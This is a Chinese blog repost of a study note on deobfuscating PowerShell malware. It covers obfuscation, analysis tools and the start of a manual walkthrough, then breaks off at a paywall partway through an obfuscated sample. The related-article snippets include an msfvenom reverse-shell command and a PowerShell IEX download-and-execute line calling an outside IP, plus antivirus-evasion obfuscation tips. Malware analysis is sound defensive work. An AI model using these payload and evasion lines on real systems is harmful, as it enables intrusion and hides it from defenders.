powershell脚本编写_病毒分析学习笔记:powershell反混淆

最新推荐文章于 2023-09-15 19:48:56 发布
最新推荐文章于 2023-09-15 19:48:56 发布
阅读量2.4k 收藏 1
点赞数
文章标签: powershell脚本编写
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39631370/article/details/111645737
版权
126423487be57a4290707c57a3736367.png

本文为看雪论坛精华文章

看雪论坛作者ID:OK繃

目录 一、前言 二、自动化反混淆               混淆原理               自动化反混淆工具 三、手动反混淆 四、总结 一、前言

Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。

它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。

Windows PowerShell v3将伴随着Microsoft Hyper-V 3.0和Windows Server 2012发布。PowerShell v3是一个Windows任务自动化的框架,它由一个命令行shell和内置在这个.NET框架上的编程语言组成。

PowerShell v3采用新的cmdlet让管理员能够更深入到系统进程中,这些进程可以制作成可执行的文件或脚本(script)。一条cmdlet是一条轻量命令,Windows PowerShell运行时间在自动化脚本的环境里调用它。

目前在流行的病毒里,还有许多使用了powershell。office宏病毒通过宏代码调用powershell执行恶意行为、powershell无文件挖矿等。

特别是无文件挖矿的反射型注入,被许多人称为老掉牙的技术了,但是在9102年了还有许多用户中招。分析这类powershell病毒时,无法避免的是面对一堆乱码——经混淆的powershell代码。一些经过高度混淆的代码,简直可以称为“非人般的操作”了。

二、自动化反混淆

>>>>

混淆原理

网上帖子太多了,可以参考下看雪论坛用户发的翻译贴:https://bbs.pediy.com/thread-248034.htm

>>>>

自动化反混淆工具

目前搜了搜,网上能自动反混淆的工具

Unit42安全团队编写的PowerShellProfiler.py:

github地址:https://github.com/pan-unit42/public_tools/tree/master/powershellprofiler

用法及原理参考:https://www.freebuf.com/sectool/219057.html

在线解码工具CyberChef:https://gchq.github.io/CyberChef/

使用方法参考:https://www.secpulse.com/archives/109912.html

以上两款工具试着使用了下,一些简单的混淆能够解开,但是一些经过好几层的混淆代码就不太好使了。

三、手动反混淆

上次遇到了一个混淆次数较多,对我来说算得上是“高度混淆”样本,记录一下我的手动反混淆过程。

原混淆代码:

"\"(neW-OBjEcT sySTeM.Io.cOMprEsSIon.deFLaTesTREAm([SYStem.io.mEMorYSTREAM][SYSteM.coNvERT]::fRombaSE64STRing('TZjHDuRIcoZfpQ8Cphu1anoWuYIO9N77WuyB3ntXJPTw4szoIJInJpMIZOb3xx/xU+fO/zSShmPcHz/q8fe62VysLXnM5vbPHz9//P/h9XLcvP8tjb+ZsTdtzlklQ//NckUXb5yzPZP6n/96RnuuN+znW/t58e8f/3Kidcu13+k4+Lm9/fuf/ywWQ0uolcNRZ7Mlvfz5h/nRbQc6v5wUAk7FqpnLJ+/2hK/Ybe20DWh6Y/32S02SXcMQa4HHZM0mcgye+1X9ezdC09DRFuXWdEAHFthUCIUHwrlARAXymyCON4uSRVFDdXB/OJRPchFH7i9hILvNnBTrOyeSg7hVm7VFSBBXe4lit0mW2oxcdbPAI2zChwxbVSA9+Wu6rHCBZbv/5VovEfRy4Zz+EkzEC1aKiWwASqkjxstrovmKOz2sqXOBBPfRmDikjpVvH+cC0fY38/5

最低0.47元/天 解锁文章
weixin_39631370
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1690
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
记一次powershell混淆(2)
weixin_30342827的博客
03-30 636
样本地址 https://www.hybrid-analysis.com/sample/4b4b8b13c264c8f7d7034060e0e4818a573bebc576a94d7b13b4c1741591687f?environmentId=100# 样本使用ConvertTo-SecureString加密字符串。 代码 powershell "([RUNTiME.iNTeRopsErV...
powershell恶意脚本解混淆
信息安全
11-11 1730
文章目录前言分析总结 前言 现在许多病毒作者为了免杀,使用powershell脚本来执行恶意行为的病毒越来越多,这次分析的一个样本就是利用powershell混淆来隐藏嵌在其中的cs后门dll 分析 样本代码 从图上可以很清晰的知道存放了一段base64数据,首先将base64数据解密,使用gzip解压,解压的数据进行执行 想要解密,也很简单: IEX用于将字符串作为命令执行,当去掉IEX后,再文件尾加上| out-file decode.txt 将 IEX (New-Object IO.StreamRe
[论文阅读] (17)CCS2019 针对PowerShell脚本的轻量级去混淆和语义感知攻击检测(经典)
杨秀璋的专栏
03-25 5155
《娜璋带你读论文》系列主要是督促自己阅读优秀论文及听取学术讲座,并分享给大家,希望您喜欢。前一篇总结了Powershell恶意代码检测相关研究,并结合开源工具分享抽象语法树提取过程。这篇文章将详细讲解CCS2019的Powershell混淆工作,这篇文章质量非常高,来自于浙江大学的李振源老师。我将从他在InforSec分享的视频和论文原文阅读两个方面进行讲解。希望这篇文章对您有所帮助,深知自己很菜,通过这种最笨分享来提升和记录,欢迎大家批评指正。这些大佬是真的值得我们去学习,献上小弟的膝盖~
记一次Powershell混淆 (1)
weixin_30896763的博客
03-16 651
样本地址: https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection 样本为一个Word文件,嵌入Macros,寻找命令执行点比较简单, 稍微跟了一下直接定位到 Sub SssbuNrRrEn(UJXYrqZETb As String) O...
MyPoSH:我学习和收集的笔记和脚本
02-10
PowerShell脚本编程】 MyPoSH中的笔记和脚本可能涵盖了PowerShell脚本编写技巧。PowerShell支持使用.NET Framework,因此可以创建复杂的脚本执行各种任务。例如,编写一个脚本来自动备份文件系统、管理IIS服务器...
hack_the_box:渗透测试学习之路
03-12
5. **PowerShell技巧**:学习如何编写和执行PowerShell脚本,进行隐蔽通信,以及如何取证。 6. **网络嗅探与数据包分析**:使用Wireshark等工具捕获和解析网络流量,寻找敏感信息。 7. **安全报告**:整理测试过程...
【python学习笔记:Django】2.启动虚拟环境库出错——Windows PowerShell中无法加载文件 xxx\Scripts\Activate.ps1,因为在此系统上禁止运行脚本
12-22
出现问题:VsCode中启动虚拟环境报错 解决方法: 以管理员身份运行 PowerShell,并...Windows PowerShell默认是Restricted(防止运行没有数字签名的脚本),要设置成remotesigned模式。 作者:被大笨猪拱了的大白菜
PowerShell:这些文件是我的一些个人PowerShell文件,可用于教学目的或自动执行笔记本电脑上的任务
02-28
学习和使用这些PowerShell脚本可以帮助你提升系统管理效率,理解PowerShell的工作机制,并且在需要时能够编写自己的自动化脚本来解决特定问题。无论你是初学者还是经验丰富的IT专业人士,这个"PowerShell-master...
ClasesISO:信息系统工作场所名称(ISO)和ASIR1º(红色系统信息):warning:Ir a laúltimaclase:backhand_index_pointing_right:https
03-27
6. **Powershell**: 微软开发的命令行界面和脚本语言,用于Windows系统管理。 7. **FileSystem**: 存储和组织文件的结构,如NTFS(Windows)和EXT(Linux)。 8. **UDP**: 用户数据报协议,一种无连接的网络协议,...
免杀对抗-PowerShell-混淆+分离
最新发布
xiaoheizi的博客
09-15 721
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
powershell 中的字符串混淆
lacoucou的专栏
06-23 391
例子1 (VarIaBLE '*MDr*').naMe[3,11,2]-JoiN'' 执行结果是 iex 解析: PS > VarIaBLE '*MDr*' #执行命令 variable '*MDr' Name Value
Pcalua+Powershell混淆
reaido的博客
01-29 282
一、Pcalua加载shellcode 1、msfvenom生成shellcode msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.104.56.140 LPORT=7100 -f psh-reflection > a.ps1 2、混淆处理 powershell "$a='IEX((new-object net.webclient).downloadstring(''ht';$b='tp://39.104.56.140:7200/a.
免杀对抗-Powershell-混淆无文件
m0_62172162的博客
04-25 823
免杀对抗-Powershell-混淆无文件
脚本病毒分析扫描专题2-Powershell代码阅读扫盲
weixin_30587025的博客
04-03 442
4.2、PowerShell 为了保障木马样本的体积很小利于传播。攻击者会借助宏->WMI->Powershell的方式下载可执行文件恶意代码。最近也经常会遇见利用Powershell通过Windows自带的组件执行系统命令绕过UAC下载文件手法的文章。 UAC:用户帐户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及...
APT污水 - 使用多阶段高度混淆PowerShell在内存中运行
JiangBuLiu的博客
05-31 4563
通过恶意宏开启多阶段高隐藏攻击链拥有历史传承的社工手法????宏入口UserForm2.Gladiator_CRKUserForm1注册表PowerShell 拥有历史传承的社工手法???? 文档打开后会通过模糊图片和文字欺骗受害者启用宏。宏代码运行后会弹出虚假的提示,表示“由于版本不兼容所以无法查看文档。”等: 污水这个显示效果和文字内容已经使用很久了: 宏 入口 从宏代码的入口就可以发现这个攻击链有一些特殊,并不是所有代码都放在默认的位置一次性执行。先从入口的“Document_Open()”函数执
秒解混淆脚本!混淆神器CyberChef使用指南
热门推荐
weixin_50464560的博客
08-19 1万+
CyberChef是一款强大的编码转换器,集成了多种编码转换的功能,能辅助大家方便快捷地解密出恶意脚本。 概述CyberChef是一款强大的编码转换器,地址在:https://gchq.github.io/CyberChef/它简单易懂易上手,集成了多种编码转换的功能,如:base64加解密、hex转换、char转换、正则表达式等,能辅助大家方便快捷地解密出恶意脚本。其界面如下图,最左边的Operations是转换工具集,把挑选好的工具经过DIY组合及排序拖拽到Recipe中,就可以对Input中的字符串
powershell免杀思路分析
mingyqf的博客
12-14 2910
powershell免杀思路分析 写在前面 powershell做为微软windows系统自带的软件包,具有十分强大的功能,Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的功能,在IT/系统管理员间得到普及。总的特点来说就是:方便、有效和隐蔽。举例来说,利用这些合法工具可以让威胁活动混在正常的网络流量或IT/系统管理工作内,也让这些恶意威胁能够留下较少的痕迹,使得侦测更加困难。在经过各种变形、加密、混淆、恶意文件放在远程服
Powershell学习笔记
来到了学渣的博客
10-16 4710
Powershell的优点 1、PowerShell可以用来管理活动目录 2、Windows7以上的操作系统默认安装 3、很多杀毒软件检测不到PowerShell的活动 4、可以从另外一个系统中下载PowerShell脚本并执行 5、cmd通常会被杀毒软件阻止运行,而PowerShell不会 6、PowerShell无须写到磁盘中,它可以直接在内存中运行。 Powershell的执行策略 Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。 Get-ExecutionPolicy命令可
Python学习笔记:从基础到进阶
本资源是一系列关于Python编程语言的学习笔记文档,涵盖了从基础入门到进阶特性的学习内容。首先,作者从Python的基础入手,介绍了Python作为一种脚本语言的入门知识,尽管Python 3.x版本已发布,但考虑到兼容性和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值